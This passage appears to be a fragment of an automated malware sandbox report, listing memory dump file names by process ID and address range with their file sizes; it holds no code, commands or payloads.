                                                                                      Filesize

                                                                                      16.6MB

                                                                                    • memory/5988-133-0x0000000000000000-mapping.dmp
                                                                                    • memory/6020-283-0x0000000000000000-mapping.dmp
                                                                                    • memory/6032-141-0x0000000000270000-0x0000000000282000-memory.dmp
                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/6032-140-0x0000000000240000-0x0000000000250000-memory.dmp
                                                                                      Filesize

                                                                                      64KB

                                                                                    • memory/6032-136-0x0000000000000000-mapping.dmp
                                                                                    • memory/6056-284-0x0000000000000000-mapping.dmp
                                                                                    • memory/6080-149-0x00000000004A0000-0x00000000004A1000-memory.dmp
                                                                                      Filesize

                                                                                      4KB

                                                                                    • memory/6080-143-0x000007FEFC051000-0x000007FEFC053000-memory.dmp
                                                                                      Filesize

                                                                                      8KB

                                                                                    • memory/6080-139-0x0000000000000000-mapping.dmp
                                                                                    • memory/6112-142-0x0000000000000000-mapping.dmp